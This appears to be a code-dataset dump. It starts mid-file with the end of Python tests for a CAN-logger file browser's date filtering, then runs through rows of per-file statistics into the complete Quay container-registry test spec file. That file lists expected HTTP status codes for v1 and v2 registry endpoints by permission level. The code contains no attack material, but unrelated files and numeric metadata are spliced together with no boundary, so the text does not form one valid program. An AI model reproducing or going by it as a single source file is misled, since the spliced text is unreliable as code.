start_date = datetime(year=2021, month=5, day=12, hour=0, tzinfo=timezone.utc)
expected_files = {
"/EEEE0001/00000004/00000769.MF4",
"/EEEE0001/00000005/00001025.MF4",
}
result = canedge_browser.get_log_files(fs, devices, start_date=start_date)
assert set(result) == expected_files
return
def test_get_log_files_with_start_date_limiting_b(self, fs):
"""Test only a subset of files are returned when the start date is inside the range.
"""
devices = ["EEEE0001"]
start_date = datetime(year=2020, month=6, day=5, hour=0, tzinfo=timezone.utc)
expected_files = {
"/EEEE0001/00000001/00000003.MF4",
"/EEEE0001/00000001/00000004.MF4",
"/EEEE0001/00000001/00000005.MF4",
"/EEEE0001/00000001/00000006.MF4",
"/EEEE0001/00000001/00000007.MF4",
"/EEEE0001/00000001/00000008.MF4",
"/EEEE0001/00000001/00000009.MF4",
"/EEEE0001/00000002/00000257.MF4",
"/EEEE0001/00000003/00000513.MF4",
"/EEEE0001/00000004/00000769.MF4",
"/EEEE0001/00000005/00001025.MF4",
}
result = canedge_browser.get_log_files(fs, devices, start_date=start_date)
assert set(result) == expected_files
return
def test_get_log_files_with_start_date_limiting_c(self, fs):
"""Test a single file is returned when the start date is outside the end of the range.
"""
devices = ["EEEE0001"]
start_date = datetime(year=2021, month=6, day=5, hour=0, tzinfo=timezone.utc)
expected_files = {
"/EEEE0001/00000005/00001025.MF4",
}
result = canedge_browser.get_log_files(fs, devices, start_date=start_date)
assert set(result) == expected_files
return
def test_get_log_files_with_stop_date(self, fs):
"""Test all files are returned when the stop date is outside the range.
"""
devices = ["EEEE0001"]
stop_date = datetime(year=2022, month=1, day=5, hour=10, tzinfo=timezone.utc)
expected_files = {
"/EEEE0001/00000001/00000001.MF4",
"/EEEE0001/00000001/00000002.MF4",
"/EEEE0001/00000001/00000003.MF4",
"/EEEE0001/00000001/00000004.MF4",
"/EEEE0001/00000001/00000005.MF4",
"/EEEE0001/00000001/00000006.MF4",
"/EEEE0001/00000001/00000007.MF4",
"/EEEE0001/00000001/00000008.MF4",
"/EEEE0001/00000001/00000009.MF4",
"/EEEE0001/00000002/00000257.MF4",
"/EEEE0001/00000003/00000513.MF4",
"/EEEE0001/00000004/00000769.MF4",
"/EEEE0001/00000005/00001025.MF4",
}
result = canedge_browser.get_log_files(fs, devices, stop_date=stop_date)
assert set(result) == expected_files
return
def test_get_log_files_with_stop_date_limiting_a(self, fs):
"""Test only a subset of files are returned when the stop date is inside the range.
"""
devices = ["EEEE0001"]
stop_date = datetime(year=2020, month=6, day=6, hour=7, tzinfo=timezone.utc)
expected_files = {
"/EEEE0001/00000001/00000001.MF4",
"/EEEE0001/00000001/00000002.MF4",
"/EEEE0001/00000001/00000003.MF4",
"/EEEE0001/00000001/00000004.MF4",
"/EEEE0001/00000001/00000005.MF4",
"/EEEE0001/00000001/00000006.MF4"
}
result = canedge_browser.get_log_files(fs, devices, stop_date=stop_date)
assert set(result) == expected_files
return
def test_get_log_files_with_stop_date_limiting_b(self, fs):
"""Test only a subset of files are returned when the stop date is inside the range.
"""
devices = ["EEEE0001"]
stop_date = datetime(year=2020, month=8, day=29, hour=7, tzinfo=timezone.utc)
expected_files = {
"/EEEE0001/00000001/00000001.MF4",
"/EEEE0001/00000001/00000002.MF4",
"/EEEE0001/00000001/00000003.MF4",
"/EEEE0001/00000001/00000004.MF4",
"/EEEE0001/00000001/00000005.MF4",
"/EEEE0001/00000001/00000006.MF4",
"/EEEE0001/00000001/00000007.MF4",
"/EEEE0001/00000001/00000008.MF4",
"/EEEE0001/00000001/00000009.MF4",
"/EEEE0001/00000002/00000257.MF4",
}
result = canedge_browser.get_log_files(fs, devices, stop_date=stop_date)
assert set(result) == expected_files
return
def test_get_log_files_with_stop_date_limiting_c(self, fs):
"""Test no files are returned when the start date is outside the end of the range.
"""
devices = ["EEEE0001"]
stop_date = datetime(year=2020, month=6, day=3, hour=0, tzinfo=timezone.utc)
result = canedge_browser.get_log_files(fs, devices, stop_date=stop_date)
assert len(result) == 0
return
def test_get_log_files_with_start_and_stop_date_limiting_a(self, fs):
"""Test only a subset of files are returned when the start and stop dates are inside the range.
"""
devices = ["EEEE0001"]
start_date = datetime(year=2020, month=6, day=5, hour=0, tzinfo=timezone.utc)
stop_date = datetime(year=2020, month=6, day=6, hour=7, tzinfo=timezone.utc)
expected_files = {
"/EEEE0001/00000001/00000003.MF4",
"/EEEE0001/00000001/00000004.MF4",
"/EEEE0001/00000001/00000005.MF4",
"/EEEE0001/00000001/00000006.MF4",
}
result = canedge_browser.get_log_files(fs, devices, start_date=start_date, stop_date=stop_date)
assert set(result) == expected_files
return
def test_get_log_files_with_start_and_stop_date_limiting_b(self, fs):
"""Test only a subset of files are returned when the start and stop dates are inside the range.
"""
devices = ["EEEE0001"]
start_date = datetime(year=2020, month=6, day=5, hour=0, tzinfo=timezone.utc)
stop_date = datetime(year=2020, month=8, day=29, hour=7, tzinfo=timezone.utc)
expected_files = {
"/EEEE0001/00000001/00000003.MF4",
"/EEEE0001/00000001/00000004.MF4",
"/EEEE0001/00000001/00000005.MF4",
"/EEEE0001/00000001/00000006.MF4",
"/EEEE0001/00000001/00000007.MF4",
"/EEEE0001/00000001/00000008.MF4",
"/EEEE0001/00000001/00000009.MF4",
"/EEEE0001/00000002/00000257.MF4",
}
result = canedge_browser.get_log_files(fs, devices, start_date=start_date, stop_date=stop_date)
assert set(result) == expected_files
return
def test_get_log_files_with_start_and_stop_date_limiting_c(self, fs):
"""Test only a single file (the last file) is returned when the start and stop dates are outside the range.
"""
devices = ["EEEE0001"]
start_date = datetime(year=2022, month=6, day=5, hour=0, tzinfo=timezone.utc)
stop_date = datetime(year=2023, month=8, day=29, hour=7, tzinfo=timezone.utc)
expected_files = {
"/EEEE0001/00000005/00001025.MF4",
}
result = canedge_browser.get_log_files(fs, devices, start_date=start_date, stop_date=stop_date)
assert set(result) == expected_files
return
def test_get_log_files_with_start_and_stop_date_limiting_d(self, fs):
"""Test only a subset of files are returned when the start and stop dates are outside the range.
"""
devices = ["EEEE0001"]
start_date = datetime(year=2018, month=6, day=5, hour=0, tzinfo=timezone.utc)
stop_date = datetime(year=2019, month=8, day=29, hour=7, tzinfo=timezone.utc)
result = canedge_browser.get_log_files(fs, devices, start_date=start_date, stop_date=stop_date)
assert len(result) == 0
return
def test_get_log_files_with_start_and_stop_date_limiting_e(self, fs):
"""Test only a subset of files are returned when the start and stop dates are inside the range, but only one
session folder.
"""
devices = ["EEEE0004"]
start_date = datetime(year=2018, month=6, day=5, hour=0, tzinfo=timezone.utc)
stop_date = datetime(year=2022, month=8, day=29, hour=7, tzinfo=timezone.utc)
expected_files = {
"/EEEE0004/00000001/00000001.MF4",
}
result = canedge_browser.get_log_files(fs, devices, start_date=start_date, stop_date=stop_date)
assert set(result) == expected_files
return
pass
| 37.197479
| 117
| 0.607365
| 1,985
| 17,706
| 5.238791
| 0.084131
| 0.126935
| 0.155303
| 0.046158
| 0.910664
| 0.895855
| 0.884989
| 0.875757
| 0.863256
| 0.8446
| 0
| 0.246516
| 0.282673
| 17,706
| 475
| 118
| 37.275789
| 0.572238
| 0.120468
| 0
| 0.762048
| 0
| 0
| 0.294385
| 0.279325
| 0
| 0
| 0
| 0
| 0.063253
| 1
| 0.072289
| false
| 0.006024
| 0.01506
| 0
| 0.165663
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
626322d69cda11071f3569293b3209bb2f3a9d5b
| 25,103
|
py
|
Python
|
test/specs.py
|
giuseppe/quay
|
a1b7e4b51974edfe86f66788621011eef2667e6a
|
[
"Apache-2.0"
] | 2,027
|
2019-11-12T18:05:48.000Z
|
2022-03-31T22:25:04.000Z
|
test/specs.py
|
giuseppe/quay
|
a1b7e4b51974edfe86f66788621011eef2667e6a
|
[
"Apache-2.0"
] | 496
|
2019-11-12T18:13:37.000Z
|
2022-03-31T10:43:45.000Z
|
test/specs.py
|
giuseppe/quay
|
a1b7e4b51974edfe86f66788621011eef2667e6a
|
[
"Apache-2.0"
] | 249
|
2019-11-12T18:02:27.000Z
|
2022-03-22T12:19:19.000Z
|
import json
import hashlib
from flask import url_for
from base64 import b64encode
NO_REPO = None
PUBLIC = "public"
PUBLIC_REPO_NAME = "publicrepo"
PUBLIC_REPO = PUBLIC + "/" + PUBLIC_REPO_NAME
PRIVATE = "devtable"
PRIVATE_REPO_NAME = "shared"
PRIVATE_REPO = PRIVATE + "/" + PRIVATE_REPO_NAME
ORG = "buynlarge"
ORG_REPO = ORG + "/orgrepo"
ANOTHER_ORG_REPO = ORG + "/anotherorgrepo"
NEW_ORG_REPO = ORG + "/neworgrepo"
ORG_REPO_NAME = "orgrepo"
ORG_READERS = "readers"
ORG_OWNER = "devtable"
ORG_OWNERS = "owners"
ORG_READERS = "readers"
FAKE_MANIFEST = "unknown_tag"
FAKE_DIGEST = "sha256:" + hashlib.sha256(b"fake").hexdigest()
FAKE_IMAGE_ID = "fake-image"
FAKE_UPLOAD_ID = "fake-upload"
FAKE_TAG_NAME = "fake-tag"
FAKE_USERNAME = "fakeuser"
FAKE_TOKEN = "fake-token"
FAKE_WEBHOOK = "fake-webhook"
BUILD_UUID = "123"
TRIGGER_UUID = "123"
NEW_ORG_REPO_DETAILS = {
"repository": "fake-repository",
"visibility": "private",
"description": "",
"namespace": ORG,
}
NEW_USER_DETAILS = {
"username": "bobby",
"password": "password",
"email": "bobby@tables.com",
}
SEND_RECOVERY_DETAILS = {
"email": "jacob.moshenko@gmail.com",
}
SIGNIN_DETAILS = {
"username": "devtable",
"password": "password",
}
FILE_DROP_DETAILS = {
"mimeType": "application/zip",
}
CHANGE_PERMISSION_DETAILS = {
"role": "admin",
}
CREATE_BUILD_DETAILS = {
"file_id": "fake-file-id",
}
CHANGE_VISIBILITY_DETAILS = {
"visibility": "public",
}
CREATE_TOKEN_DETAILS = {
"friendlyName": "A new token",
}
UPDATE_REPO_DETAILS = {
"description": "A new description",
}
class IndexV1TestSpec(object):
def __init__(
self,
url,
sess_repo=None,
anon_code=403,
no_access_code=403,
read_code=200,
creator_code=200,
admin_code=200,
):
self._url = url
self._method = "GET"
self._data = None
self.sess_repo = sess_repo
self.anon_code = anon_code
self.no_access_code = no_access_code
self.read_code = read_code
self.creator_code = creator_code
self.admin_code = admin_code
def gen_basic_auth(self, username, password):
encoded = b64encode(b"%s:%s" % (username.encode("ascii"), password.encode("ascii")))
return "basic %s" % encoded.decode("ascii")
def set_data_from_obj(self, json_serializable):
self._data = json.dumps(json_serializable)
return self
def set_method(self, method):
self._method = method
return self
def get_client_args(self):
kwargs = {"method": self._method}
if self._data or self._method == "POST" or self._method == "PUT" or self._method == "PATCH":
kwargs["data"] = self._data if self._data else "{}"
kwargs["content_type"] = "application/json"
return self._url, kwargs
def build_v1_index_specs():
return [
IndexV1TestSpec(
url_for("v1.get_image_layer", image_id=FAKE_IMAGE_ID),
PUBLIC_REPO,
404,
404,
404,
404,
404,
),
IndexV1TestSpec(
url_for("v1.get_image_layer", image_id=FAKE_IMAGE_ID),
PRIVATE_REPO,
403,
403,
404,
403,
404,
),
IndexV1TestSpec(
url_for("v1.get_image_layer", image_id=FAKE_IMAGE_ID), ORG_REPO, 403, 403, 404, 403, 404
),
IndexV1TestSpec(
url_for("v1.get_image_layer", image_id=FAKE_IMAGE_ID),
ANOTHER_ORG_REPO,
403,
403,
403,
403,
404,
),
IndexV1TestSpec(
url_for("v1.put_image_layer", image_id=FAKE_IMAGE_ID),
PUBLIC_REPO,
403,
403,
403,
403,
403,
).set_method("PUT"),
IndexV1TestSpec(
url_for("v1.put_image_layer", image_id=FAKE_IMAGE_ID),
PRIVATE_REPO,
403,
403,
403,
403,
400,
).set_method("PUT"),
IndexV1TestSpec(
url_for("v1.put_image_layer", image_id=FAKE_IMAGE_ID), ORG_REPO, 403, 403, 403, 403, 400
).set_method("PUT"),
IndexV1TestSpec(
url_for("v1.put_image_layer", image_id=FAKE_IMAGE_ID),
ANOTHER_ORG_REPO,
403,
403,
403,
403,
400,
).set_method("PUT"),
IndexV1TestSpec(
url_for("v1.put_image_checksum", image_id=FAKE_IMAGE_ID),
PUBLIC_REPO,
403,
403,
403,
403,
403,
).set_method("PUT"),
IndexV1TestSpec(
url_for("v1.put_image_checksum", image_id=FAKE_IMAGE_ID),
PRIVATE_REPO,
403,
403,
403,
403,
400,
).set_method("PUT"),
IndexV1TestSpec(
url_for("v1.put_image_checksum", image_id=FAKE_IMAGE_ID),
ORG_REPO,
403,
403,
403,
403,
400,
).set_method("PUT"),
IndexV1TestSpec(
url_for("v1.put_image_checksum", image_id=FAKE_IMAGE_ID),
ANOTHER_ORG_REPO,
403,
403,
403,
403,
400,
).set_method("PUT"),
IndexV1TestSpec(
url_for("v1.get_image_json", image_id=FAKE_IMAGE_ID),
PUBLIC_REPO,
404,
404,
404,
404,
404,
),
IndexV1TestSpec(
url_for("v1.get_image_json", image_id=FAKE_IMAGE_ID),
PRIVATE_REPO,
403,
403,
404,
403,
404,
),
IndexV1TestSpec(
url_for("v1.get_image_json", image_id=FAKE_IMAGE_ID), ORG_REPO, 403, 403, 404, 403, 404
),
IndexV1TestSpec(
url_for("v1.get_image_json", image_id=FAKE_IMAGE_ID),
ANOTHER_ORG_REPO,
403,
403,
403,
403,
404,
),
IndexV1TestSpec(
url_for("v1.get_image_ancestry", image_id=FAKE_IMAGE_ID),
PUBLIC_REPO,
404,
404,
404,
404,
404,
),
IndexV1TestSpec(
url_for("v1.get_image_ancestry", image_id=FAKE_IMAGE_ID),
PRIVATE_REPO,
403,
403,
404,
403,
404,
),
IndexV1TestSpec(
url_for("v1.get_image_ancestry", image_id=FAKE_IMAGE_ID),
ORG_REPO,
403,
403,
404,
403,
404,
),
IndexV1TestSpec(
url_for("v1.get_image_ancestry", image_id=FAKE_IMAGE_ID),
ANOTHER_ORG_REPO,
403,
403,
403,
403,
404,
),
IndexV1TestSpec(
url_for("v1.put_image_json", image_id=FAKE_IMAGE_ID),
PUBLIC_REPO,
403,
403,
403,
403,
403,
).set_method("PUT"),
IndexV1TestSpec(
url_for("v1.put_image_json", image_id=FAKE_IMAGE_ID),
PRIVATE_REPO,
403,
403,
403,
403,
400,
).set_method("PUT"),
IndexV1TestSpec(
url_for("v1.put_image_json", image_id=FAKE_IMAGE_ID), ORG_REPO, 403, 403, 403, 403, 400
).set_method("PUT"),
IndexV1TestSpec(
url_for("v1.put_image_json", image_id=FAKE_IMAGE_ID),
ANOTHER_ORG_REPO,
403,
403,
403,
403,
400,
).set_method("PUT"),
IndexV1TestSpec(url_for("v1.create_user"), NO_REPO, 400, 400, 400, 400, 400)
.set_method("POST")
.set_data_from_obj(NEW_USER_DETAILS),
IndexV1TestSpec(url_for("v1.get_user"), NO_REPO, 404, 200, 200, 200, 200),
IndexV1TestSpec(
url_for("v1.update_user", username=FAKE_USERNAME), NO_REPO, 403, 403, 403, 403, 403
).set_method("PUT"),
IndexV1TestSpec(
url_for("v1.create_repository", repository=PUBLIC_REPO),
NO_REPO,
403,
403,
403,
403,
403,
).set_method("PUT"),
IndexV1TestSpec(
url_for("v1.create_repository", repository=PRIVATE_REPO),
NO_REPO,
403,
403,
403,
403,
201,
).set_method("PUT"),
IndexV1TestSpec(
url_for("v1.create_repository", repository=ORG_REPO), NO_REPO, 403, 403, 403, 403, 201
).set_method("PUT"),
IndexV1TestSpec(
url_for("v1.create_repository", repository=ANOTHER_ORG_REPO),
NO_REPO,
403,
403,
403,
403,
201,
).set_method("PUT"),
IndexV1TestSpec(
url_for("v1.create_repository", repository=NEW_ORG_REPO),
NO_REPO,
401,
403,
403,
201,
201,
).set_method("PUT"),
IndexV1TestSpec(
url_for("v1.update_images", repository=PUBLIC_REPO), NO_REPO, 403, 403, 403, 403, 403
).set_method("PUT"),
IndexV1TestSpec(
url_for("v1.update_images", repository=PRIVATE_REPO), NO_REPO, 403, 403, 403, 403, 400
).set_method("PUT"),
IndexV1TestSpec(
url_for("v1.update_images", repository=ORG_REPO), NO_REPO, 403, 403, 403, 403, 400
).set_method("PUT"),
IndexV1TestSpec(
url_for("v1.update_images", repository=ANOTHER_ORG_REPO),
NO_REPO,
403,
403,
403,
403,
400,
).set_method("PUT"),
IndexV1TestSpec(
url_for("v1.get_repository_images", repository=PUBLIC_REPO),
NO_REPO,
200,
200,
200,
200,
200,
),
IndexV1TestSpec(
url_for("v1.get_repository_images", repository=PRIVATE_REPO),
NO_REPO,
403,
403,
200,
403,
200,
),
IndexV1TestSpec(
url_for("v1.get_repository_images", repository=ORG_REPO),
NO_REPO,
403,
403,
200,
403,
200,
),
IndexV1TestSpec(
url_for("v1.get_repository_images", repository=ANOTHER_ORG_REPO),
NO_REPO,
403,
403,
403,
403,
200,
),
IndexV1TestSpec(
url_for("v1.delete_repository_images", repository=PUBLIC_REPO),
NO_REPO,
501,
501,
501,
501,
501,
).set_method("DELETE"),
IndexV1TestSpec(
url_for("v1.put_repository_auth", repository=PUBLIC_REPO),
NO_REPO,
501,
501,
501,
501,
501,
).set_method("PUT"),
IndexV1TestSpec(url_for("v1.get_search"), NO_REPO, 200, 200, 200, 200, 200),
IndexV1TestSpec(url_for("v1.ping"), NO_REPO, 200, 200, 200, 200, 200),
IndexV1TestSpec(
url_for("v1.get_tags", repository=PUBLIC_REPO), NO_REPO, 200, 200, 200, 200, 200
),
IndexV1TestSpec(
url_for("v1.get_tags", repository=PRIVATE_REPO), NO_REPO, 403, 403, 200, 403, 200
),
IndexV1TestSpec(
url_for("v1.get_tags", repository=ORG_REPO), NO_REPO, 403, 403, 200, 403, 200
),
IndexV1TestSpec(
url_for("v1.get_tags", repository=ANOTHER_ORG_REPO), NO_REPO, 403, 403, 403, 403, 200
),
IndexV1TestSpec(
url_for("v1.get_tag", repository=PUBLIC_REPO, tag=FAKE_TAG_NAME),
NO_REPO,
404,
404,
404,
404,
404,
),
IndexV1TestSpec(
url_for("v1.get_tag", repository=PRIVATE_REPO, tag=FAKE_TAG_NAME),
NO_REPO,
403,
403,
404,
403,
404,
),
IndexV1TestSpec(
url_for("v1.get_tag", repository=ORG_REPO, tag=FAKE_TAG_NAME),
NO_REPO,
403,
403,
404,
403,
404,
),
IndexV1TestSpec(
url_for("v1.get_tag", repository=ANOTHER_ORG_REPO, tag=FAKE_TAG_NAME),
NO_REPO,
403,
403,
403,
403,
404,
),
IndexV1TestSpec(
url_for("v1.put_tag", repository=PUBLIC_REPO, tag=FAKE_TAG_NAME),
NO_REPO,
403,
403,
403,
403,
403,
).set_method("PUT"),
IndexV1TestSpec(
url_for("v1.put_tag", repository=PRIVATE_REPO, tag=FAKE_TAG_NAME),
NO_REPO,
403,
403,
403,
403,
400,
).set_method("PUT"),
IndexV1TestSpec(
url_for("v1.put_tag", repository=ORG_REPO, tag=FAKE_TAG_NAME),
NO_REPO,
403,
403,
403,
403,
400,
).set_method("PUT"),
IndexV1TestSpec(
url_for("v1.put_tag", repository=ANOTHER_ORG_REPO, tag=FAKE_TAG_NAME),
NO_REPO,
403,
403,
403,
403,
400,
).set_method("PUT"),
IndexV1TestSpec(
url_for("v1.delete_tag", repository=PUBLIC_REPO, tag=FAKE_TAG_NAME),
NO_REPO,
403,
403,
403,
403,
403,
).set_method("DELETE"),
IndexV1TestSpec(
url_for("v1.delete_tag", repository=PRIVATE_REPO, tag=FAKE_TAG_NAME),
NO_REPO,
403,
403,
403,
403,
400,
).set_method("DELETE"),
IndexV1TestSpec(
url_for("v1.delete_tag", repository=ORG_REPO, tag=FAKE_TAG_NAME),
NO_REPO,
403,
403,
403,
403,
400,
).set_method("DELETE"),
IndexV1TestSpec(
url_for("v1.delete_tag", repository=ANOTHER_ORG_REPO, tag=FAKE_TAG_NAME),
NO_REPO,
403,
403,
403,
403,
400,
).set_method("DELETE"),
]
class IndexV2TestSpec(object):
def __init__(self, index_name, method_name, repo_name, scope=None, **kwargs):
self.index_name = index_name
self.repo_name = repo_name
self.method_name = method_name
default_scope = "push,pull" if method_name != "GET" and method_name != "HEAD" else "pull"
self.scope = scope or default_scope
self.kwargs = kwargs
self.anon_code = 401
self.no_access_code = 403
self.read_code = 200
self.admin_code = 200
self.creator_code = 200
def request_status(
self, anon_code=401, no_access_code=403, read_code=200, creator_code=200, admin_code=200
):
self.anon_code = anon_code
self.no_access_code = no_access_code
self.read_code = read_code
self.creator_code = creator_code
self.admin_code = admin_code
return self
def get_url(self):
return url_for(self.index_name, repository=self.repo_name, **self.kwargs)
def gen_basic_auth(self, username, password):
encoded = b64encode(b"%s:%s" % (username.encode("ascii"), password.encode("ascii")))
return "basic %s" % encoded.decode("ascii")
def get_scope_string(self):
return "repository:%s:%s" % (self.repo_name, self.scope)
def build_v2_index_specs():
return [
# v2.list_all_tags
IndexV2TestSpec("v2.list_all_tags", "GET", PUBLIC_REPO).request_status(
200, 200, 200, 200, 200
),
IndexV2TestSpec("v2.list_all_tags", "GET", PRIVATE_REPO).request_status(
401, 401, 200, 401, 200
),
IndexV2TestSpec("v2.list_all_tags", "GET", ORG_REPO).request_status(
401, 401, 200, 401, 200
),
IndexV2TestSpec("v2.list_all_tags", "GET", ANOTHER_ORG_REPO).request_status(
401, 401, 401, 401, 200
),
# v2.fetch_manifest_by_tagname
IndexV2TestSpec(
"v2.fetch_manifest_by_tagname", "GET", PUBLIC_REPO, manifest_ref=FAKE_MANIFEST
).request_status(404, 404, 404, 404, 404),
IndexV2TestSpec(
"v2.fetch_manifest_by_tagname", "GET", PRIVATE_REPO, manifest_ref=FAKE_MANIFEST
).request_status(401, 401, 404, 401, 404),
IndexV2TestSpec(
"v2.fetch_manifest_by_tagname", "GET", ORG_REPO, manifest_ref=FAKE_MANIFEST
).request_status(401, 401, 404, 401, 404),
IndexV2TestSpec(
"v2.fetch_manifest_by_tagname", "GET", ANOTHER_ORG_REPO, manifest_ref=FAKE_MANIFEST
).request_status(401, 401, 401, 401, 404),
# v2.fetch_manifest_by_digest
IndexV2TestSpec(
"v2.fetch_manifest_by_digest", "GET", PUBLIC_REPO, manifest_ref=FAKE_DIGEST
).request_status(404, 404, 404, 404, 404),
IndexV2TestSpec(
"v2.fetch_manifest_by_digest", "GET", PRIVATE_REPO, manifest_ref=FAKE_DIGEST
).request_status(401, 401, 404, 401, 404),
IndexV2TestSpec(
"v2.fetch_manifest_by_digest", "GET", ORG_REPO, manifest_ref=FAKE_DIGEST
).request_status(401, 401, 404, 401, 404),
IndexV2TestSpec(
"v2.fetch_manifest_by_digest", "GET", ANOTHER_ORG_REPO, manifest_ref=FAKE_DIGEST
).request_status(401, 401, 401, 401, 404),
# v2.write_manifest_by_tagname
IndexV2TestSpec(
"v2.write_manifest_by_tagname", "PUT", PUBLIC_REPO, manifest_ref=FAKE_MANIFEST
).request_status(401, 401, 401, 401, 401),
IndexV2TestSpec(
"v2.write_manifest_by_tagname", "PUT", PRIVATE_REPO, manifest_ref=FAKE_MANIFEST
).request_status(401, 401, 401, 401, 400),
IndexV2TestSpec(
"v2.write_manifest_by_tagname", "PUT", ORG_REPO, manifest_ref=FAKE_MANIFEST
).request_status(401, 401, 401, 401, 400),
IndexV2TestSpec(
"v2.write_manifest_by_tagname", "PUT", ANOTHER_ORG_REPO, manifest_ref=FAKE_MANIFEST
).request_status(401, 401, 401, 401, 400),
# v2.write_manifest_by_digest
IndexV2TestSpec(
"v2.write_manifest_by_digest", "PUT", PUBLIC_REPO, manifest_ref=FAKE_DIGEST
).request_status(401, 401, 401, 401, 401),
IndexV2TestSpec(
"v2.write_manifest_by_digest", "PUT", PRIVATE_REPO, manifest_ref=FAKE_DIGEST
).request_status(401, 401, 401, 401, 400),
IndexV2TestSpec(
"v2.write_manifest_by_digest", "PUT", ORG_REPO, manifest_ref=FAKE_DIGEST
).request_status(401, 401, 401, 401, 400),
IndexV2TestSpec(
"v2.write_manifest_by_digest", "PUT", ANOTHER_ORG_REPO, manifest_ref=FAKE_DIGEST
).request_status(401, 401, 401, 401, 400),
# v2.delete_manifest_by_digest
IndexV2TestSpec(
"v2.delete_manifest_by_digest", "DELETE", PUBLIC_REPO, manifest_ref=FAKE_DIGEST
).request_status(401, 401, 401, 401, 401),
IndexV2TestSpec(
"v2.delete_manifest_by_digest", "DELETE", PRIVATE_REPO, manifest_ref=FAKE_DIGEST
).request_status(401, 401, 401, 401, 404),
IndexV2TestSpec(
"v2.delete_manifest_by_digest", "DELETE", ORG_REPO, manifest_ref=FAKE_DIGEST
).request_status(401, 401, 401, 401, 404),
IndexV2TestSpec(
"v2.delete_manifest_by_digest", "DELETE", ANOTHER_ORG_REPO, manifest_ref=FAKE_DIGEST
).request_status(401, 401, 401, 401, 404),
# v2.check_blob_exists
IndexV2TestSpec(
"v2.check_blob_exists", "HEAD", PUBLIC_REPO, digest=FAKE_DIGEST
).request_status(404, 404, 404, 404, 404),
IndexV2TestSpec(
"v2.check_blob_exists", "HEAD", PRIVATE_REPO, digest=FAKE_DIGEST
).request_status(401, 401, 404, 401, 404),
IndexV2TestSpec(
"v2.check_blob_exists", "HEAD", ORG_REPO, digest=FAKE_DIGEST
).request_status(401, 401, 404, 401, 404),
IndexV2TestSpec(
"v2.check_blob_exists", "HEAD", ANOTHER_ORG_REPO, digest=FAKE_DIGEST
).request_status(401, 401, 401, 401, 404),
# v2.download_blob
IndexV2TestSpec("v2.download_blob", "GET", PUBLIC_REPO, digest=FAKE_DIGEST).request_status(
404, 404, 404, 404, 404
),
IndexV2TestSpec("v2.download_blob", "GET", PRIVATE_REPO, digest=FAKE_DIGEST).request_status(
401, 401, 404, 401, 404
),
IndexV2TestSpec("v2.download_blob", "GET", ORG_REPO, digest=FAKE_DIGEST).request_status(
401, 401, 404, 401, 404
),
IndexV2TestSpec(
"v2.download_blob", "GET", ANOTHER_ORG_REPO, digest=FAKE_DIGEST
).request_status(401, 401, 401, 401, 404),
# v2.start_blob_upload
IndexV2TestSpec("v2.start_blob_upload", "POST", PUBLIC_REPO).request_status(
401, 401, 401, 401, 401
),
IndexV2TestSpec("v2.start_blob_upload", "POST", PRIVATE_REPO).request_status(
401, 401, 401, 401, 202
),
IndexV2TestSpec("v2.start_blob_upload", "POST", ORG_REPO).request_status(
401, 401, 401, 401, 202
),
IndexV2TestSpec("v2.start_blob_upload", "POST", ANOTHER_ORG_REPO).request_status(
401, 401, 401, 401, 202
),
# v2.fetch_existing_upload
IndexV2TestSpec(
"v2.fetch_existing_upload", "GET", PUBLIC_REPO, "push,pull", upload_uuid=FAKE_UPLOAD_ID
).request_status(401, 401, 401, 401, 401),
IndexV2TestSpec(
"v2.fetch_existing_upload", "GET", PRIVATE_REPO, "push,pull", upload_uuid=FAKE_UPLOAD_ID
).request_status(401, 401, 401, 401, 404),
IndexV2TestSpec(
"v2.fetch_existing_upload", "GET", ORG_REPO, "push,pull", upload_uuid=FAKE_UPLOAD_ID
).request_status(401, 401, 401, 401, 404),
IndexV2TestSpec(
"v2.fetch_existing_upload",
"GET",
ANOTHER_ORG_REPO,
"push,pull",
upload_uuid=FAKE_UPLOAD_ID,
).request_status(401, 401, 401, 401, 404),
# v2.upload_chunk
IndexV2TestSpec(
"v2.upload_chunk", "PATCH", PUBLIC_REPO, upload_uuid=FAKE_UPLOAD_ID
).request_status(401, 401, 401, 401, 401),
IndexV2TestSpec(
"v2.upload_chunk", "PATCH", PRIVATE_REPO, upload_uuid=FAKE_UPLOAD_ID
).request_status(401, 401, 401, 401, 404),
IndexV2TestSpec(
"v2.upload_chunk", "PATCH", ORG_REPO, upload_uuid=FAKE_UPLOAD_ID
).request_status(401, 401, 401, 401, 404),
IndexV2TestSpec(
"v2.upload_chunk", "PATCH", ANOTHER_ORG_REPO, upload_uuid=FAKE_UPLOAD_ID
).request_status(401, 401, 401, 401, 404),
# v2.monolithic_upload_or_last_chunk
IndexV2TestSpec(
"v2.monolithic_upload_or_last_chunk", "PUT", PUBLIC_REPO, upload_uuid=FAKE_UPLOAD_ID
).request_status(401, 401, 401, 401, 401),
IndexV2TestSpec(
"v2.monolithic_upload_or_last_chunk", "PUT", PRIVATE_REPO, upload_uuid=FAKE_UPLOAD_ID
).request_status(401, 401, 401, 401, 400),
IndexV2TestSpec(
"v2.monolithic_upload_or_last_chunk", "PUT", ORG_REPO, upload_uuid=FAKE_UPLOAD_ID
).request_status(401, 401, 401, 401, 400),
IndexV2TestSpec(
"v2.monolithic_upload_or_last_chunk",
"PUT",
ANOTHER_ORG_REPO,
upload_uuid=FAKE_UPLOAD_ID,
).request_status(401, 401, 401, 401, 400),
# v2.cancel_upload
IndexV2TestSpec(
"v2.cancel_upload", "DELETE", PUBLIC_REPO, upload_uuid=FAKE_UPLOAD_ID
).request_status(401, 401, 401, 401, 401),
IndexV2TestSpec(
"v2.cancel_upload", "DELETE", PRIVATE_REPO, upload_uuid=FAKE_UPLOAD_ID
).request_status(401, 401, 401, 401, 404),
IndexV2TestSpec(
"v2.cancel_upload", "DELETE", ORG_REPO, upload_uuid=FAKE_UPLOAD_ID
).request_status(401, 401, 401, 401, 404),
IndexV2TestSpec(
"v2.cancel_upload", "DELETE", ANOTHER_ORG_REPO, upload_uuid=FAKE_UPLOAD_ID
).request_status(401, 401, 401, 401, 404),
]
| 31.937659
| 100
| 0.553679
| 2,788
| 25,103
| 4.656743
| 0.058465
| 0.059616
| 0.056844
| 0.106293
| 0.820689
| 0.797813
| 0.779173
| 0.750751
| 0.731033
| 0.718786
| 0
| 0.11948
| 0.337848
| 25,103
| 785
| 101
| 31.978344
| 0.661593
| 0.012389
| 0
| 0.711354
